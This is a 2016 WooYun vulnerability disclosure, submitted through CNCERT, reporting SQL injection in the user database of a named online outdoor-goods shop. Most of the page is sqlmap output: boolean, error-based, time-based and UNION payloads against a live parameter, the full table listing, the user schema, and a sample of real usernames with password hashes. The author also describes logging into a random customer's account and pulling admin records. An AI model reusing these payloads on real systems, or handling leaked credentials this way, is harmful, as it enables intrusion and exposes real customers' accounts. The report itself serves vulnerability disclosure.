当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168286

漏洞标题:购物网澳道商城存在sql注入泄露用户数据(26000多条数据)

相关厂商:澳道官方商城

漏洞作者: Nelion

提交时间:2016-01-11 22:56

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

购物网澳道商城(http://www.auzzieoutdoors.cn/index.html)存在sql注入泄露用户数据(26797条数据)。用户信息可登陆。同时可注出管理员信息;

详细说明:

1、注入点:

http://**.**.**.**/brands/oe/category?cid=287


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=287) AND 7546=7546 AND (4466=4466
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cid=287) AND (SELECT 1891 FROM(SELECT COUNT(*),CONCAT(0x7176717671,(SELECT (ELT(1891=18
91,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (15
09=1509
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cid=287) AND (SELECT * FROM (SELECT(SLEEP(5)))DGIb) AND (7616=7616
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cid=287) UNION ALL SELECT NULL,CONCAT(0x7176717671,0x706a43554b747a704c74,0x71787a7671)
,NULL,NULL,NULL--
---
[09:41:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0

漏洞证明:

2、所有数据库:

available databases [2]:
[*] information_schema
[*] **.**.**.**


3、**.**.**.**库中的表:

Database: **.**.**.**
[248 tables]
+---------------------------------------+
| aodao_account_log                     |
| aodao_ad                              |
| aodao_ad_custom                       |
| aodao_ad_position                     |
| aodao_admin_action                    |
| aodao_admin_log                       |
| aodao_admin_message                   |
| aodao_admin_user                      |
| aodao_adsense                         |
| aodao_advice                          |
| aodao_affiliate_log                   |
| aodao_agency                          |
| aodao_area_region                     |
| aodao_article                         |
| aodao_article_cat                     |
| aodao_attribute                       |
| aodao_attribute_sorting               |
| aodao_auction_log                     |
| aodao_auto_manage                     |
| aodao_back_goods                      |
| aodao_back_order                      |
| aodao_bonus_type                      |
| aodao_booking_goods                   |
| aodao_brand                           |
| aodao_brand_banner                    |
| aodao_brand_cat_goods                 |
| aodao_brand_nav                       |
| aodao_card                            |
| aodao_cart                            |
| aodao_cat_goods_order                 |
| aodao_cat_recommend                   |
| aodao_category                        |
| aodao_collect_goods                   |
| aodao_comment                         |
| aodao_crons                           |
| aodao_delivery_goods                  |
| aodao_delivery_order                  |
| aodao_email_list                      |
| aodao_email_sendlist                  |
| aodao_error_log                       |
| aodao_exchange_goods                  |
| aodao_favourable_activity             |
| aodao_feedback                        |
| aodao_friend_link                     |
| aodao_goods                           |
| aodao_goods_activity                  |
| aodao_goods_article                   |
| aodao_goods_attr                      |
| aodao_goods_cat                       |
| aodao_goods_gallery                   |
| aodao_goods_type                      |
| aodao_group_goods                     |
| aodao_keywords                        |
| aodao_link_goods                      |
| aodao_mail_templates                  |
| aodao_media                           |
| aodao_member_price                    |
| aodao_nav                             |
| aodao_oms_inventorystock              |
| aodao_oms_log                         |
| aodao_order_action                    |
| aodao_order_goods                     |
| aodao_order_info                      |
| aodao_pack                            |
| aodao_package_goods                   |
| aodao_pay_log                         |
| aodao_pay_points                      |
| aodao_payment                         |
| aodao_photo                           |
| aodao_photo_like                      |
| aodao_photo_review                    |
| aodao_plugins                         |
| aodao_products                        |
| aodao_promote                         |
| aodao_promote_order                   |
| aodao_promote_pic                     |
| aodao_reg_extend_info                 |
| aodao_reg_fields                      |
| aodao_region                          |
| aodao_region_bak2                     |
| aodao_role                            |
| aodao_searchengine                    |
| aodao_series                          |
| aodao_sessions                        |
| aodao_sessions_data                   |
| aodao_shipping                        |
| aodao_shipping_area                   |
| aodao_shop_config                     |
| aodao_snatch_log                      |
| aodao_stats                           |
| aodao_suppliers                       |
| aodao_syncoms_order                   |
| aodao_tag                             |
| aodao_template                        |
| aodao_topic                           |
| aodao_user_account                    |
| aodao_user_address                    |
| aodao_user_bonus                      |
| aodao_user_bonus_log                  |
| aodao_user_feed                       |
| aodao_user_rank                       |
| aodao_users                           |
| aodao_virtual_card                    |
| aodao_volume_price                    |
| aodao_vote                            |
| aodao_vote_log                        |
| aodao_vote_option                     |
| aodao_wholesale                       |
| blogaodao_blog_versions               |
| blogaodao_blogs                       |
| blogaodao_commentmeta                 |
| blogaodao_comments                    |
| blogaodao_huge_itportfolio_images     |
| blogaodao_huge_itportfolio_portfolios |
| blogaodao_links                       |
| blogaodao_nextend_smartslider_layouts |
| blogaodao_nextend_smartslider_sliders |
| blogaodao_nextend_smartslider_slides  |
| blogaodao_nextend_smartslider_storage |
| blogaodao_options                     |
| blogaodao_postmeta                    |
| blogaodao_posts                       |
| blogaodao_registration_log            |
| blogaodao_signups                     |
| blogaodao_site                        |
| blogaodao_sitemeta                    |
| blogaodao_term_relationships          |
| blogaodao_term_taxonomy               |
| blogaodao_terms                       |
| blogaodao_usermeta                    |
| blogaodao_users                       |
| blogaodao_visitor_maps_ge             |
| blogaodao_visitor_maps_st             |
| blogaodao_visitor_maps_wo             |
| blogaodao_wysija_campaign             |
| blogaodao_wysija_campaign_list        |
| blogaodao_wysija_custom_field         |
| blogaodao_wysija_email                |
| blogaodao_wysija_email_user_stat      |
| blogaodao_wysija_email_user_url       |
| blogaodao_wysija_form                 |
| blogaodao_wysija_list                 |
| blogaodao_wysija_queue                |
| blogaodao_wysija_url                  |
| blogaodao_wysija_url_mail             |
| blogaodao_wysija_user                 |
| blogaodao_wysija_user_field           |
| blogaodao_wysija_user_history         |
| blogaodao_wysija_user_list            |
| ecs_account_log                       |
| ecs_ad                                |
| ecs_ad_custom                         |
| ecs_ad_position                       |
| ecs_admin_action                      |
| ecs_admin_log                         |
| ecs_admin_message                     |
| ecs_admin_user                        |
| ecs_adsense                           |
| ecs_affiliate_log                     |
| ecs_agency                            |
| ecs_area_region                       |
| ecs_article                           |
| ecs_article_cat                       |
| ecs_attribute                         |
| ecs_auction_log                       |
| ecs_auto_manage                       |
| ecs_back_goods                        |
| ecs_back_order                        |
| ecs_bonus_type                        |
| ecs_booking_goods                     |
| ecs_brand                             |
| ecs_card                              |
| ecs_cart                              |
| ecs_cat_recommend                     |
| ecs_category                          |
| ecs_collect_goods                     |
| ecs_comment                           |
| ecs_crons                             |
| ecs_delivery_goods                    |
| ecs_delivery_order                    |
| ecs_email_list                        |
| ecs_email_sendlist                    |
| ecs_error_log                         |
| ecs_exchange_goods                    |
| ecs_favourable_activity               |
| ecs_feedback                          |
| ecs_friend_link                       |
| ecs_goods                             |
| ecs_goods_activity                    |
| ecs_goods_article                     |
| ecs_goods_attr                        |
| ecs_goods_cat                         |
| ecs_goods_gallery                     |
| ecs_goods_type                        |
| ecs_group_goods                       |
| ecs_keywords                          |
| ecs_link_goods                        |
| ecs_mail_templates                    |
| ecs_member_price                      |
| ecs_nav                               |
| ecs_order_action                      |
| ecs_order_goods                       |
| ecs_order_info                        |
| ecs_pack                              |
| ecs_package_goods                     |
| ecs_pay_log                           |
| ecs_payment                           |
| ecs_plugins                           |
| ecs_products                          |
| ecs_reg_extend_info                   |
| ecs_reg_fields                        |
| ecs_region                            |
| ecs_role                              |
| ecs_searchengine                      |
| ecs_sessions                          |
| ecs_sessions_data                     |
| ecs_shipping                          |
| ecs_shipping_area                     |
| ecs_shop_config                       |
| ecs_snatch_log                        |
| ecs_stats                             |
| ecs_suppliers                         |
| ecs_tag                               |
| ecs_template                          |
| ecs_topic                             |
| ecs_user_account                      |
| ecs_user_address                      |
| ecs_user_bonus                        |
| ecs_user_feed                         |
| ecs_user_rank                         |
| ecs_users                             |
| ecs_virtual_card                      |
| ecs_volume_price                      |
| ecs_vote                              |
| ecs_vote_log                          |
| ecs_vote_option                       |
| ecs_wholesale                         |
| wp_commentmeta                        |
| wp_comments                           |
| wp_links                              |
| wp_options                            |
| wp_postmeta                           |
| wp_posts                              |
| wp_term_relationships                 |
| wp_term_taxonomy                      |
| wp_terms                              |
| wp_usermeta                           |
| wp_users                              |
+---------------------------------------+


4、用户表aodao_users中的字段:

Database: **.**.**.**
Table: aodao_users
[38 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| address_id      | mediumint(8) unsigned  |
| aite_id         | text                   |
| alias           | varchar(60)            |
| answer          | varchar(255)           |
| birthday        | date                   |
| credit_line     | decimal(10,2) unsigned |
| ec_salt         | varchar(10)            |
| email           | varchar(60)            |
| flag            | tinyint(3) unsigned    |
| frozen_money    | decimal(10,2)          |
| home_phone      | varchar(20)            |
| is_special      | tinyint(3) unsigned    |
| is_validated    | tinyint(3) unsigned    |
| last_ip         | varchar(15)            |
| last_login      | int(11) unsigned       |
| last_time       | datetime               |
| ltinfo          | varchar(255)           |
| mobile_phone    | varchar(20)            |
| msn             | varchar(60)            |
| office_phone    | varchar(20)            |
| openid          | varchar(32)            |
| parent_id       | mediumint(9)           |
| passwd_answer   | varchar(255)           |
| passwd_question | varchar(50)            |
| password        | varchar(32)            |
| pay_points      | int(10) unsigned       |
| qq              | varchar(20)            |
| question        | varchar(255)           |
| rank_points     | int(10) unsigned       |
| reg_source      | varchar(32)            |
| reg_time        | int(10) unsigned       |
| salt            | varchar(10)            |
| sex             | tinyint(1) unsigned    |
| user_id         | mediumint(8) unsigned  |
| user_money      | decimal(10,2)          |
| user_name       | varchar(60)            |
| user_rank       | tinyint(3) unsigned    |
| visit_count     | smallint(5) unsigned   |
+-----------------+------------------------+


5、user_name,password,mobile_phone,email,sex字段的数据(部分数据):

Database: **.**.**.**
Table: aodao_users
[26797 entries]
+-----------------------------------------+---------------------------------------------------------
------+----------------------------------+------------------------------------+---------------------
----+------------+
| user_name                               | password
      | mobile_phone                     | email                              | sex
    | birthday   |
+-----------------------------------------+---------------------------------------------------------
------+----------------------------------+------------------------------------+---------------------
----+------------+
[08:46:17] [WARNING] console output will be trimmed to last 256 rows due to large table size
| F3A23D150C2156B4475F756F54A3197A@**.**.**.** | 69b0a928cd722a6b3e42a9a3c0334054
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 9A5A195077D30DB6E8FBFDF696027DCC@**.**.**.** | 575c4facfd099cd9dcfc35d416c9cca3
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 56251E60C71A463BEADE55D899E4EB90@**.**.**.** | 186df3259b54743f12f2f179f81fd493
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 8764169D4D854038A4A9CADE8B36A1E4@**.**.**.** | dfec10e9a881c372715a09ee071ce0a1
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 2AE0604195C08F80B92EF051087FA246@**.**.**.** | be3c8967b7b434b42e5e63e82bf2c94f
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| BA7D878154C5D5EF514CB8709A0F6B1B@**.**.**.** | f40dc51fe6646ffe3bd14061c6c73d42
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 01FE08BD834B6B96C84FEACA8170D12C@**.**.**.** | 3a10405dc50978f45b1a6ab681624591
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 4F4EA3D2F2BFE9CD24C4A2D049D17F42@**.**.**.** | bee66989db78c2e8871ca4df7649b278
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 7D7BB307CE0DC3AE3126CDBA3520C545@**.**.**.** | 37d639646aa49b03df1009a79dd65683
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 04819E2610335787FD458D89F05005A7@**.**.**.** | 433a654e6e4f773ec2eefcce7d1fe0d8
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 505065ADBBEDE5C50CB3D11608A63504@**.**.**.** | d7fd50965380c0daa2b3714589eea677
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 0BD6D86E2382BABB2C687CC72E764C0D@**.**.**.** | 5ed2c4ad1bfd3f24d6d98f020cb2282f
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 5EC8C8261FC1B90C376ADB7FC3B705E4@**.**.**.** | 339024fd1a43a5d27e8601a43447081c
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 94FF225E7C42F58A6FB0E744EA7B543A@**.**.**.** | 25bdb072beb0ac49c403bd2d358a8d48
      | <blank>                          | <blank>                            | 0
    | 0000-00-00 |
| 46CABB8DFBC7E80E7D525EDD7CE00B09@**.**.**.** | 9d945f8152345588ed56032039974152


6、随意找个用户登录一下:

userLogin.png


7、管理员用户信息:

aodao_admin_users.png


8、密码没破出来。

修复方案:

参数过滤

版权声明:转载请注明来源 Nelion@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-15 15:33

厂商回复:

CNVD未直接复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无